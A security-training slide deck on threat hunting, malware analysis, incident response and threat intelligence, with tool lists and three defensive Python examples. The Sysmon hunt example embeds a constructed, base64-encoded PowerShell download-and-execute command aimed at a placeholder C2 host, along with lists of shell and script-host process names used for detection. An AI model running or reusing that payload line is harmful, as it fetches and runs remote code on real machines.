Ramin Farajpour Cami
Twitter: MF4RR3LL
GitHub: @raminfp
Malware Analysis
METHODOLOGY FOR HANDLING SECURITY INCIDENTS, BREACHES, AND CYBER THREATS
• 1] Threat Hunting
• 2] Malware Analysis
• 3] Incident Response
• 4] Threat Intelligence
WHAT IS THREAT HUNTING?
• The process of proactively and iteratively searching through networks to detect and
isolate advanced threats that evade existing security solutions.
– Track, intercept and eliminate adversaries lurking in a network
– Tools: SIEM, IDS, Firewall
• Video: https://www.exabeam.com/product/exabeam-threat-hunter/
THREAT HUNTER SKILLS
• Data analytics and reporting skills — these include pattern recognition,
technical writing, data science, problem solving and research.
• Operating systems and networks knowledge — needs to know the ins and outs of
the organizational systems and network.
• Information security experience — including malware reverse engineering, adversary
tracking and endpoint security. A threat hunter needs a clear understanding of
past and current tactics, techniques and procedures (TTPs) used by attackers.
• Programming language — at least one scripting language and one compiled
language is common, though modern tools are increasingly reducing the need for
scripting.
THREAT HUNTING REFERENCES
Name                        Description
MITRE ATT&CK                Website with information on adversary techniques relevant to hunting
The ThreatHunting Project   Website with information on getting started with threat hunting
HUNTPEDIA                   A very handy book
THREAT HUNTING TOOLS
Name      License  Description
ELK       Free     A platform that helps to build use cases and test hypotheses for threat hunting.
Sysmon    Free     System Monitor (Sysmon) is a Windows system service and device driver that, once
                   installed on a system, remains resident across system reboots to monitor and log
                   system activity to the Windows event log.
Osquery   Free     Performant endpoint visibility; supports all major OS platforms (Windows, Linux, macOS).
ELK
• Beats - https://github.com/elastic/beats
– Docs : https://github.com/elastic/beats#documentation-and-getting-started
• ElasticSearch - https://www.elastic.co/elasticsearch/
• Logstash - https://github.com/elastic/logstash
• Kibana - https://www.elastic.co/kibana/
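Threat hunting with the stack above means turning a hypothesis into a query over the telemetry Sysmon produces. The Python script below is an added example, not from the original slides: it parses four constructed Sysmon Event ID 1 (ProcessCreate) records in the XML layout the Windows event log exports, and tests two hypotheses against them: an Office application spawning a shell or script host, and PowerShell launched with an -EncodedCommand payload, which it decodes. The process paths, user names and the c2.example.invalid URL in the payload are assumptions made up for the sample.

```python
"""Hypothesis-driven hunt over Sysmon Event ID 1 (ProcessCreate) records.

Added example, not part of the original slides. The events are constructed to
look like Sysmon XML exported from the Windows event log (same schema namespace
and <Data Name="..."> layout); paths, users and the payload URL are made up.
"""
import base64
import binascii
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Hypothesis 1: an Office application spawning a shell / script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                  "cscript.exe", "mshta.exe", "rundll32.exe"}

# Hypothesis 2: PowerShell with an encoded command. The switch takes base64 of UTF-16LE.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')"  # constructed
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")


def _event(image, cmdline, parent, user="CORP\\jdoe"):
    """Build one constructed Sysmon ProcessCreate event (Event ID 1)."""
    return (
        f'<Event xmlns="{NS[1:-1]}">'
        '<System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID></System>'
        "<EventData>"
        f'<Data Name="Image">{escape(image)}</Data>'
        f'<Data Name="CommandLine">{escape(cmdline)}</Data>'
        f'<Data Name="ParentImage">{escape(parent)}</Data>'
        f'<Data Name="User">{escape(user)}</Data>'
        "</EventData></Event>"
    )


SAMPLE_EVENTS = [  # constructed telemetry
    _event(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
           r'"C:\Program Files\Google\Chrome\Application\chrome.exe"',
           r"C:\Windows\explorer.exe"),
    _event(r"C:\Windows\System32\cmd.exe",
           r"cmd.exe /c whoami > C:\Users\Public\w.txt",
           r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    _event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           f"powershell.exe -nop -w hidden -enc {ENCODED}",
           r"C:\Windows\System32\services.exe", user="NT AUTHORITY\\SYSTEM"),
    _event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           "powershell.exe -NoProfile -Command Get-Date",
           r"C:\Windows\System32\cmd.exe"),
]


def parse_event(xml_text):
    """Return {'EventID': int, <Data Name>: value, ...} for one Sysmon event."""
    root = ET.fromstring(xml_text)
    rec = {"EventID": int(root.find(f"{NS}System/{NS}EventID").text)}
    for d in root.iterfind(f"{NS}EventData/{NS}Data"):
        rec[d.get("Name")] = d.text or ""
    return rec


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, None if the switch is absent,
    or '<undecodable>' if the argument is not valid base64 / UTF-16LE.

    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...).
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower().lstrip("-/")
        if tok[:1] in "-/" and flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (binascii.Error, UnicodeDecodeError):
                return "<undecodable>"
    return None


def hunt(xml_events):
    """Apply both hypotheses to the events; return findings in event order."""
    findings = []
    for raw in xml_events:
        ev = parse_event(raw)
        if ev["EventID"] != 1:
            continue
        child, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
            findings.append({"hypothesis": "office-spawns-shell", "parent": parent,
                             "child": child, "cmdline": ev["CommandLine"]})
        if child in {"powershell.exe", "pwsh.exe"}:
            decoded = decode_encoded_command(ev["CommandLine"])
            if decoded is not None:
                findings.append({"hypothesis": "encoded-powershell",
                                 "user": ev["User"], "decoded": decoded})
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

In an ELK deployment the same two tests become queries over the fields Winlogbeat ships from the Sysmon channel; writing them out once in code first makes clear which artefacts you pivot on next (the parent/child pair, the decoded payload and its URL), and the `<undecodable>` branch keeps a malformed argument from aborting the whole hunt.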
WHAT IS MALWARE ANALYSIS?
• The process of understanding the behavior and purpose of a suspicious file or URL.
The output of the analysis aids in the detection and mitigation of the potential threat:
– Malware investigation
– What the malware does (its behavior)
– The purpose of the malware
– How malicious it is (severity)
– Analysis of the traffic it sends
– How it connects to its server (C&C)
– Malware code structure
– IOCs expressed as YARA / Snort rules
• Malware analysis helps incident responders (IR) and security analysts triage alerts.
MALWARE ANALYSIS SKILLS
• Networking
• IOC (indicator) analysis: YARA / Snort
• Static Analysis
• Dynamic Analysis
• Memory Forensics
• RE (Reverse Engineering)
• File Format
• OS Internal
• Coding / Script
WHAT IS INCIDENT RESPONSE ?
• Structured approach to handle various types of security incidents, cyber threats, and
data breaches.
• The incident response methodology aims to identify, contain, and minimize the cost of
a cyberattack or a live incident.
• Why Is Incident Response Important?
– Data breaches cost companies operational downtime, reputational damage and financial loss.
– For most organizations, breaches lead to a drop in stock value and loss of
customer trust.
– To reduce such risks, companies need a well-planned cybersecurity incident response
plan.
• https://youtu.be/NIKIJodcxOk
GRAPHITE – GRAFANA – DIAMOND
• Graphite: https://graphiteapp.org/
• Grafana: https://github.com/grafana/grafana
• Or Prometheus: https://github.com/prometheus/prometheus
• Diamond: https://github.com/python-diamond/Diamond
Installation: https://github.com/SecurityTalks/Malware-Analysis
WHAT ARE THE COMMON TYPES OF INCIDENTS?
WHAT IS THREAT INTELLIGENCE?
• Cyber threat information becomes cyber threat intelligence once it has been collected,
evaluated in the context of its source and reliability, and analyzed.
• It requires that analysts identify similarities and differences in vast quantities of
information and detect deception to produce accurate, timely, and relevant
intelligence.
THREAT INTELLIGENCE RESOURCES
Source Name                    Subscription  Status
dydns                          Free          Online
emergingthreats (botcc)        Free          Online
feodotracker                   Free          Online
greensnow                      Free          Online
h3xtracker                     Free          Online
hphosts (malware)              Free          Online
iblocklist                     Free          Online
ibmxforce                      Free          Online
intercept.sh                   Free          Online
malc0de                        Free          Online
malware_traffic                Free          Online
malwared.malwaremustdie.org    Free          Online
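Most of the sources in the table are plain-text IP blocklists, and the definition above only counts a match as intelligence once it is read against the feed's reliability. The Python below is an added example, not from the original slides and not tied to any of the feeds listed: it normalises a constructed feed (comments, duplicates, CIDR ranges, a malformed line) into exact hosts and networks, then matches it against constructed firewall log lines. The addresses are documentation and private ranges chosen for the sample, not real indicators, and the log line format is an assumption.

```python
"""Operationalising a free IP indicator feed: normalise it, then match it
against firewall log lines.

Added example, not part of the original slides. FEED and LOGS are constructed:
the feed imitates a typical plaintext blocklist (comments, bare IPs, CIDRs) and
the logs a simple firewall connection log. Addresses are test/documentation ranges.
"""
import ipaddress
import re

FEED = """\
# Constructed sample feed (layout similar to many free IP blocklists)
# updated: 2020-11-01
198.51.100.23        # single host
203.0.113.0/24       # whole documentation block
192.0.2.77
198.51.100.23        # duplicate entry on purpose
not-an-address
"""

LOGS = [  # constructed firewall connection log
    "2020-11-01T10:00:01Z fw1 ALLOW src=10.0.5.12 dst=198.51.100.23 dport=443 proto=tcp",
    "2020-11-01T10:00:02Z fw1 ALLOW src=10.0.5.12 dst=192.0.2.10 dport=443 proto=tcp",
    "2020-11-01T10:00:05Z fw1 ALLOW src=10.0.7.4 dst=203.0.113.99 dport=8080 proto=tcp",
    "2020-11-01T10:00:09Z fw1 DENY src=192.0.2.77 dst=10.0.0.25 dport=22 proto=tcp",
    "2020-11-01T10:00:11Z fw1 ALLOW src=10.0.5.12 dst=10.0.0.25 dport=445 proto=tcp",
]

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<action>\S+) "
                    r"src=(?P<src>\S+) dst=(?P<dst>\S+)")


def load_feed(text):
    """Parse a blocklist into (set of exact hosts, list of networks).

    Comments and blank lines are dropped, duplicates collapse into the set, and a
    malformed entry is skipped instead of aborting the whole feed load.
    """
    hosts, nets = set(), []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        try:
            net = ipaddress.ip_network(line, strict=False)
        except ValueError:
            continue
        if net.num_addresses == 1:
            hosts.add(net.network_address)
        else:
            nets.append(net)
    return hosts, nets


def lookup(addr, hosts, nets):
    """Return the feed entry (host or CIDR) that covers addr, or None."""
    ip = ipaddress.ip_address(addr)
    if ip in hosts:
        return str(ip)
    for net in nets:
        if ip in net:
            return str(net)
    return None


def match_logs(lines, hosts, nets, source="constructed-feed"):
    """Return one hit per (line, direction) whose address is on the feed."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for direction in ("src", "dst"):
            indicator = lookup(m[direction], hosts, nets)
            if indicator:
                hits.append({"ts": m["ts"], "action": m["action"], "direction": direction,
                             "ip": m[direction], "indicator": indicator, "source": source})
    return hits


if __name__ == "__main__":
    h, n = load_feed(FEED)
    for hit in match_logs(LOGS, h, n):
        print(hit)
```

Each hit carries the feed it came from on purpose: a match against a noisy list is a lead to evaluate, not an incident, and the analyst needs the source to weigh it. An ALLOWed outbound connection to a listed host (the first hit) is the one to chase first; an inbound DENY from a listed address (the fourth line) is mostly confirmation the firewall did its job.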
BAD PACKETS CYBER THREAT INTELLIGENCE - EXAMPLE
STATIC MALWARE ANALYSIS
Name           License                  Platform
DIE            Free                     Windows, Linux, macOS
PE-bear        Free                     Windows, Linux, macOS
PortEx         Free                     Java (cross-platform)
Manalyze       Free                     Windows, Linux, macOS
PE Studio      Free                     Windows
MASTIFF        Free                     Linux (Python)
Exeinfo PE     Free                     Windows
CFF Explorer   Free                     Windows
PE Tools       Free                     Windows
FileAlyzer     Free                     Windows
PE Explorer    Paid (trial available)   Windows
PE Insider     Free                     Windows
PEview         Free                     Windows
CHimpREC       Free                     Windows
PEiD           Free                     Windows
REVERSE ENGINEERING
Name      License                     Platform
IDA       Paid (IDA Free available)   Windows, Linux, macOS
Ghidra    Free                        Windows, Linux, macOS
Cutter    Free                        Windows, Linux, macOS
radare2   Free                        Windows, Linux, macOS
DYNAMIC MALWARE ANALYSIS
• What to look for while the sample runs:
– Does the code execute? Which commands does it execute?
– System checks (OS name, environment)
– Persistence
– Anti-debugging
– Encoding / obfuscation
  DeObfuscation ALFA SHELL V3: https://github.com/raminfp/DeObfuscation_ALFA_SHELL_V3
– Win API calls
– Internet connectivity check
YOUTUBE CHANNEL FOR MALWARE ANALYSIS
YouTube Channel Name
OALabs
Kindred Security
Colin Hardy
MalwareAnalysisForHedgehogs
Michael Gillespie
ReverseIT
LiveOverflow
hasherezade
John Hammond
MalwareTech
RSA Conference
Monnappa K A
DOCUMENT ANALYSIS – PDF / WORD / EXCEL
Name                         License  Platform
oletools                     Free     Python
Didier Stevens' PDF tools    Free     Python
Origami                      Free     Ruby
REMnux                       Free     Virtual machine (Linux distribution)
PDF                          Free     Binary
ViperMonkey                  Free     Python
MALWARE REPORT (TECHNICAL)
• Summary
– Initial access vector (if known)
– Category (Ransomware, Rootkit, Bootkit, ...)
• File Metadata Information
– Filename
– MD5 hash
– File type
– File size
– SHA256 hash
– PE information / fileless
• Static Analysis
– Domains / IPs
– Obfuscation and encryption
– Anti-reversing / anti-sandbox tricks
• Dynamic Analysis
– Execution
– Connection to C&C
– Logs
– Traffic
– YARA rule
Example reports:
https://isc.sans.edu/diary/26750
https://isc.sans.edu/diary/26744
https://us-cert.cisa.gov/ncas/alerts/aa20-302a
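To fill the File Metadata and Static Analysis sections of this report template, and as a programmatic counterpart to the PE tools listed earlier, the following Python is an added example, not from the original slides and not the output of any of those tools. It computes the hashes, identifies PE32 versus PE32+, reads the machine type and entry point, and flags sections that look packed (high entropy), are writable and executable, or contain the entry point outside .text. The input is a constructed, non-runnable PE32+ image built by build_sample(), whose second section is filled with pseudo-random bytes to imitate a packed section; the section names, flags and the 7.0-bit entropy threshold are assumptions for the sample.

```python
"""Static triage for the File Metadata / Static Analysis sections of a malware report:
hashes, PE type, machine, entry point, per-section entropy and packing heuristics.

Added example, not part of the original slides and not the output of any tool listed
above. The input is a constructed, non-runnable PE32+ image from build_sample(); its
second section holds pseudo-random bytes to imitate a packed/encrypted section.
"""
import hashlib
import math
import struct

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER (40 bytes)
COFF_HDR = "<HHIIIHH"                          # IMAGE_FILE_HEADER (20 bytes)
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
ENTROPY_THRESHOLD = 7.0                        # assumption: above this, suspect packing


def build_sample():
    """Constructed PE32+: a low-entropy .text plus a UPX-style packed section."""
    text = bytes([0x90, 0xC3] * 0x100)                        # 0x200 bytes, entropy 1.0
    packed = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest()
                      for i in range(128))                     # 0x1000 pseudo-random bytes
    sections = [(b".text", 0x1000, text, 0x60000020),          # CODE|EXECUTE|READ
                (b"UPX1", 0x2000, packed, 0xE0000040)]         # DATA|EXECUTE|READ|WRITE
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    coff = struct.pack(COFF_HDR, 0x8664, len(sections), 0, 0, 0, 240, 0x0022)
    opt = bytearray(240)                                       # PE32+ optional header
    struct.pack_into("<H", opt, 0, 0x20B)                      # Magic
    struct.pack_into("<I", opt, 16, 0x2000)                    # AddressOfEntryPoint -> UPX1
    struct.pack_into("<Q", opt, 24, 0x140000000)               # ImageBase
    hdrs, raw_off, body = dos + b"PE\0\0" + coff + bytes(opt), 0x200, b""
    for name, rva, data, flags in sections:
        hdrs += SECTION_HDR.pack(name.ljust(8, b"\0"), len(data), rva, len(data),
                                 raw_off, 0, 0, 0, 0, flags)
        raw_off, body = raw_off + len(data), body + data
    return hdrs.ljust(0x200, b"\0") + body


def entropy(data):
    """Shannon entropy in bits per byte (0.0 .. 8.0); near 8 suggests packing/encryption."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage(data, filename="sample.bin"):
    """Return the report fields for data; anything that is not a PE gets file_type 'unknown'."""
    rep = {"filename": filename, "size": len(data),
           "md5": hashlib.md5(data).hexdigest(),
           "sha256": hashlib.sha256(data).hexdigest(),
           "file_type": "unknown", "sections": [], "suspicious": []}
    if data[:2] != b"MZ" or len(data) < 0x40:
        return rep
    try:
        pe = struct.unpack_from("<I", data, 0x3C)[0]
        if data[pe:pe + 4] != b"PE\0\0":
            return rep
        machine, nsec, _, _, _, opt_size, _ = struct.unpack_from(COFF_HDR, data, pe + 4)
        opt = pe + 24
        magic = struct.unpack_from("<H", data, opt)[0]
        rep["file_type"] = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "unknown")
        rep["machine"] = {0x14C: "x86", 0x8664: "x64"}.get(machine, hex(machine))
        entry = rep["entry_point"] = struct.unpack_from("<I", data, opt + 16)[0]
        for i in range(nsec):
            name, vsize, rva, rsize, raw, _, _, _, _, flags = SECTION_HDR.unpack_from(
                data, opt + opt_size + 40 * i)
            name = name.rstrip(b"\0").decode("ascii", "replace")
            ent = entropy(data[raw:raw + rsize])
            wx = bool(flags & IMAGE_SCN_MEM_WRITE and flags & IMAGE_SCN_MEM_EXECUTE)
            rep["sections"].append({"name": name, "rva": rva, "raw_size": rsize,
                                    "entropy": round(ent, 2), "wx": wx})
            if ent > ENTROPY_THRESHOLD:
                rep["suspicious"].append(f"{name}: entropy {ent:.2f} (packed/encrypted?)")
            if wx:
                rep["suspicious"].append(f"{name}: writable+executable section")
            if rva <= entry < rva + max(vsize, rsize):
                rep["entry_section"] = name
                if name != ".text":
                    rep["suspicious"].append(f"entry point in {name}, not .text")
    except struct.error:
        rep["suspicious"].append("truncated PE headers")
    return rep


if __name__ == "__main__":
    import json
    print(json.dumps(triage(build_sample(), "sample.exe"), indent=2))
```

The three heuristics are the ones the "Obfuscation and Encryption" line of the template usually turns on: a packer leaves a high-entropy section, often makes it writable and executable so it can unpack in place, and moves the entry point into its stub. Report the hashes of the file as received, before any unpacking, so that other analysts can correlate on them.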
WEAKNESSES OF CERT.IR / AFTA
• Very poor report style
• No activity on social media networks
• No activity on GitHub
• No cyber-security content
• Copy-and-paste news
SOLUTION
• Activity on Twitter
• Activity on GitHub, open-source repositories (e.g. YARA rules)
• "Infrastructure Bug Bounty" (IBB)
• Own research (Cafebazaar / p30download / soft98)
• Publish tools for malware analysis
HOW TO WORK WITH OTHER RESEARCHERS? EXAMPLE
WHO TO FOLLOW ON TWITTER
• https://twitter.com/executemalware
• https://twitter.com/malware_traffic
• https://twitter.com/JRoosen
• https://twitter.com/HONKONE_K
• https://twitter.com/3xp0rtblog
• https://twitter.com/mal_share
• https://twitter.com/RedDrip7
• https://twitter.com/Arkbird_SOLG
• https://twitter.com/MalwarePatrol
• https://twitter.com/DidierStevens
• https://twitter.com/CyberIOCs
• https://twitter.com/DissectMalware
• https://twitter.com/MITREattack
• https://twitter.com/Ledtech3
• https://twitter.com/VK_Intel
THE END
• Questions?
